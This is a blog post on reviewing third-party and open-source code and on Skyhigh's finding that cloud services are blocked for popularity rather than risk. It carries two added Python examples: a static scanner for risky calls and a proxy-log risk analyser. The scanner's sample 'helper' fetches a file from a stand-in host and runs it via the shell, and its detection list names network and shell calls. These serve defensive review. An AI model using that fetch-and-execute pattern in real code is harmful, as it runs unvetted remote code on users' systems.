
@CloudExpo: Blog Feed Post

Code from the Cloud: Are You Getting More Than You Bargained For?

Data from Skyhigh reveals that popularity, not risk, will get you blocked, leaving some of the riskiest services available

It was at my very first job as a developer that I learned about code reviews (and that I intuitively hated them, a characteristic I share with many developers, I've since learned). We wrote and maintained software that automated tax preparation (yes, you may in fact be using services that contain code I touched long ago - caveat emptor ;-)), and going over code was an important part of the process. In addition to making sure we were following coding standards with respect to source formatting, there was also the opportunity for improvements and to find potential mistakes that might be disastrous given the nature of the software we developed.

Fast forward a number of years (right, like I was going to tell you how many) and code reviews are still a part of the development process. The thing is that the reasons for reviewing source code have expanded, primarily thanks to the success of open source.

It goes without saying (but I'll say it anyway) that the practice of "code reviews" needs to expand in terms of who conducts them, too, as "code" moves out of the walled application development garden and spills over into devops and networking teams.

Yes, as a matter of fact, those Chef recipes and Perl and Python scripts are a kind of code. So are the OpenStack packages you downloaded and that OSS SDN controller, just as surely as the node.js package (Restify) that an application developer grabbed is code. Given the rising importance of automation and orchestration to realize continuous delivery and improve network service velocity, scripts and code that drive such systems should be carefully reviewed to ensure a simple mistake (ever misplace a semi-colon in an if statement? Hmmm?) does not lead to disastrous downtime or disruption.

It needs to be reviewed. Carefully. Not necessarily for style, but for substance. Not only because coding errors can lead to downtime and disruption, but because code acquired from third-party services is ripe for exploitation by the omnipresent "bad guys" looking for an opportunity to inject malware into an organization for fun and/or profit, no matter what use the code is intended to serve.

If you think that's fanciful paranoia - think again. As Skyhigh Networks points out in their first annual Cloud Adoption & Risk Report, code sharing services have, in fact, seen compromise in recent years. Some of us will recall, of course, similar issues with tainted Linux RPMs many (more) years ago.

[Figure: code-sharing compromises]

It's unrealistic to believe that every code review of OSS-acquired code will find a risk - even when one exists. Hundreds of thousands - to millions - of lines of code are shared and wind up included in software every day. That's a lot of code to review. But someone should take a look through it - whether using automated static analysis tools (even I can write a grep statement to scan for the use of sockets and files and the like to point out potential areas in need of closer examination) or manual evaluation.
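A small version of the "point out areas in need of closer examination" pass described above, added here as an example (it is not code from the original post or from Skyhigh). It parses acquired Python scripts with the standard `ast` module rather than grepping raw text, so `import subprocess as sp` and `from os import system` are resolved back to their real names instead of slipping past a pattern match. The `INDICATORS` table and the sample "helper" script are constructed for the example; a real rule set would be tuned to what your organization considers review-worthy.

```python
"""Lightweight triage scanner for acquired Python code.

Added example (not part of the original post): a static-analysis pass that
flags calls touching the network, the shell, the filesystem, or dynamic code
evaluation, so a reviewer knows where to look first. The INDICATORS table is
a constructed starting point, not a complete rule set.
"""
import ast
import pathlib

# Constructed table: call name (after alias resolution) -> why it matters.
INDICATORS = {
    "socket": "network access",
    "urllib": "network access",
    "subprocess": "process execution",
    "os.system": "shell execution",
    "os.popen": "shell execution",
    "eval": "dynamic code evaluation",
    "exec": "dynamic code evaluation",
    "base64.b64decode": "decodes an embedded payload",
    "ctypes": "native code loading",
}


def _dotted(node):
    """Return the dotted name of a call target (e.g. 'os.system'), or None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _opens_for_writing(call):
    """True if an open() call asks for a writable mode ('w', 'a', 'x', '+')."""
    mode = call.args[1] if len(call.args) > 1 else None
    for kw in call.keywords:
        if kw.arg == "mode":
            mode = kw.value
    return (isinstance(mode, ast.Constant) and isinstance(mode.value, str)
            and any(c in mode.value for c in "wax+"))


def scan_source(source, filename="<string>"):
    """Return (filename, line, resolved_name, reason) tuples, sorted by line."""
    try:
        tree = ast.parse(source, filename)
    except SyntaxError as err:
        # Unparseable code is itself a finding: it has to be read by hand.
        return [(filename, err.lineno or 0, "<syntax error>", "could not parse")]
    # Map local aliases back to real names so 'import subprocess as sp' and
    # 'from os import system' are not missed.
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                aliases[alias.asname or alias.name] = alias.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for alias in node.names:
                aliases[alias.asname or alias.name] = f"{node.module}.{alias.name}"
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted(node.func)
        if name is None:
            continue
        head, _, rest = name.partition(".")
        real = aliases.get(head, head) + ("." + rest if rest else "")
        for key, reason in INDICATORS.items():
            if real == key or real.startswith(key + "."):
                findings.append((filename, node.lineno, real, reason))
                break
        else:
            if real == "open" and _opens_for_writing(node):
                findings.append((filename, node.lineno, "open", "file write"))
    return sorted(findings, key=lambda f: f[1])


def scan_tree(root):
    """Scan every .py file under root and return all findings."""
    findings = []
    for path in sorted(pathlib.Path(root).rglob("*.py")):
        findings.extend(scan_source(path.read_text(), str(path)))
    return findings


if __name__ == "__main__":
    # Constructed sample: a 'helper' that fetches a file and runs it via the shell.
    SAMPLE = (
        "import subprocess as sp\n"
        "from urllib.request import urlopen\n"
        "def update():\n"
        "    blob = urlopen('http://example.invalid/u').read()\n"
        "    with open('/tmp/u.sh', 'w') as fh:\n"
        "        fh.write(blob.decode())\n"
        "    sp.run(['sh', '/tmp/u.sh'])\n"
    )
    for f in scan_source(SAMPLE, "helper.py"):
        print("%s:%d  %-28s %s" % f)
```

Run it against a checkout with `scan_tree("path/to/acquired/code")`; each finding is a line number to open, not a verdict. Anything the table does not name still needs the manual read the paragraph above calls for.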

And it shouldn't matter whether the code was acquired for inclusion in a web application, in devops, or for automating the network. Code is code; it should be reviewed with an eye toward the very real risk it presents to the organization.

The same goes for the other risky services Skyhigh found prevalent in just about every organization across its report. With 3,000,000 users of cloud services included, its findings are not ones you should ignore.

Popularity Trumps Risk

The best way to sum up Skyhigh's findings is that popularity trumps actual risk. For a significant portion of organizations, the popularity - and thus awareness - of cloud services is what gets them banned from crossing the data center firewall. Organizations are, according to Skyhigh, blocking services based on (perceived) productivity loss - not risk.

Granted, productivity loss is a risk - a business risk - but that kind of risk can often be managed better through behavioral management techniques, not technological ones.

The bigger problem is not the blocking of popular social media and cloud service sites, but the reasons why they come to the attention of policy makers that lay down the blocking law in the first place. It's all about popularity, about awareness.

Cloud services today are blocked mostly on the reasoning that, because a service is well known and our firewall logs show connections to it in our Top Ten Eye Candy Report, it must be cutting into our time. Thus it is blocked.

Those sites that don't appear in the Top Ten (or even Top Twenty) but carry with them even more risk (because they are less well used and likely less mature in terms of security and addressing enterprise concerns) are left available to corporate users.

This is evident as you peruse Skyhigh's report, with sites like Dropbox blocked on a regular basis, but up-and-coming Rapidgator? It's barely noticed, despite its higher risk rating. GitHub? Blocked 21 percent of the time, but high-risk service Codehaus? Blocked only 1% of the time, because it hasn't got the mindshare and popularity of GitHub. But it only takes one user, after all, to use a risky service and unintentionally introduce malware or malicious code that takes out a corporate network.

That's why visibility - awareness - is so important. It's critical to ensuring that third-party source code, as well as services used, accessed, and acquired from the cloud, are acceptable for use within an organization. Skyhigh claims that cloud service usage is at least 10 times higher than organizations actually believe. Its data certainly appears to back that up.

Whether it's understanding what services - and what risks they pose - or what code is being included in applications, visibility is the key to being able to set policies that address real risks, rather than those inferred by popularity.
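The popularity-versus-risk gap described in the last few paragraphs, as an added example that is not part of the original post or of Skyhigh's report. It reads constructed proxy log lines, ranks known services by connection count (the "Top Ten" view that drives most blocking), then cross-references a risk register to list services that are rated risky but were never blocked, and hosts the register does not recognise at all. The service names are the ones the post mentions; the log lines, the log format, the risk scores and the block decisions are all constructed for the example.

```python
"""Visibility check for cloud service usage, added here as an example (it is
not from the Skyhigh report). It ranks destinations seen in proxy logs by
connection count (the 'Top Ten' view that drives most blocking), then
cross-references a risk register to surface services that are risky but
allowed, and hosts the register does not know at all.
"""
import re
from collections import Counter, defaultdict

# Constructed proxy log lines: timestamp, client IP, policy action, host.
LOG_LINES = """\
2014-03-03T09:12:01Z 10.1.4.22 ALLOW www.dropbox.com
2014-03-03T09:12:05Z 10.1.4.23 ALLOW www.dropbox.com
2014-03-03T09:13:10Z 10.1.4.24 ALLOW dl.dropbox.com
2014-03-03T09:14:42Z 10.1.4.22 BLOCK github.com
2014-03-03T09:15:00Z 10.1.4.25 BLOCK api.github.com
2014-03-03T09:16:30Z 10.1.4.26 ALLOW repository.codehaus.org
2014-03-03T09:17:11Z 10.1.4.27 ALLOW rapidgator.net
2014-03-03T09:18:45Z 10.1.4.27 ALLOW rapidgator.net
2014-03-03T09:19:02Z 10.1.4.28 ALLOW files.example-share.invalid
2014-03-03T09:20:19Z 10.1.4.22 ALLOW www.dropbox.com
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<action>ALLOW|BLOCK) (?P<host>\S+)$")

# Constructed risk register: registered domain -> (service name, risk 1-10).
# The ratings are illustrative; a real register comes from your own vetting.
RISK_REGISTER = {
    "dropbox.com": ("Dropbox", 4),
    "github.com": ("GitHub", 3),
    "codehaus.org": ("Codehaus", 8),
    "rapidgator.net": ("Rapidgator", 9),
}


def parse_log(text):
    """Parse log lines into dicts; malformed lines are skipped, not guessed."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def classify(host):
    """Map a host to a register entry by matching its registered domain."""
    labels = host.lower().split(".")
    for i in range(len(labels) - 1):
        entry = RISK_REGISTER.get(".".join(labels[i:]))
        if entry:
            return entry
    return None


def popularity(events):
    """Connection counts per known service, most popular first."""
    counts = Counter()
    for ev in events:
        entry = classify(ev["host"])
        if entry:
            counts[entry[0]] += 1
    return counts.most_common()


def risky_allowed(events, min_risk=7):
    """Known services at or above min_risk that the policy never blocked, as
    (service, risk, connections, distinct clients), riskiest first."""
    seen = defaultdict(lambda: {"risk": 0, "conns": 0, "clients": set(), "blocked": False})
    for ev in events:
        entry = classify(ev["host"])
        if not entry:
            continue
        name, risk = entry
        s = seen[name]
        s["risk"] = risk
        s["conns"] += 1
        s["clients"].add(ev["client"])
        s["blocked"] |= ev["action"] == "BLOCK"
    rows = [(name, s["risk"], s["conns"], len(s["clients"]))
            for name, s in seen.items() if s["risk"] >= min_risk and not s["blocked"]]
    return sorted(rows, key=lambda r: (-r[1], -r[2]))


def unclassified(events):
    """Hosts the register knows nothing about: the real visibility gap."""
    return sorted({ev["host"] for ev in events if classify(ev["host"]) is None})


if __name__ == "__main__":
    evs = parse_log(LOG_LINES)
    print("By popularity:   ", popularity(evs))
    print("Risky but allowed:", risky_allowed(evs))
    print("Unclassified:     ", unclassified(evs))
```

On the sample, Dropbox tops the popularity list and GitHub is the only blocked service, while the two highest-risk services are allowed through by a single user each; the unclassified host is the one nobody has looked at yet. The useful output for policy is the second and third lists, not the first.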

You can find Skyhigh Networks' report here - I definitely suggest a read through, it's eye-opening stuff.

More Stories By Lori MacVittie

Lori MacVittie is responsible for education and evangelism of application services available across F5’s entire product suite. Her role includes authorship of technical materials and participation in a number of community-based forums and industry standards organizations, among other efforts. MacVittie has extensive programming experience as an application architect, as well as network and systems development and administration expertise. Prior to joining F5, MacVittie was an award-winning Senior Technology Editor at Network Computing Magazine, where she conducted product research and evaluation focused on integration with application and network architectures, and authored articles on a variety of topics aimed at IT professionals. Her most recent area of focus included SOA-related products and architectures. She holds a B.S. in Information and Computing Science from the University of Wisconsin at Green Bay, and an M.S. in Computer Science from Nova Southeastern University.
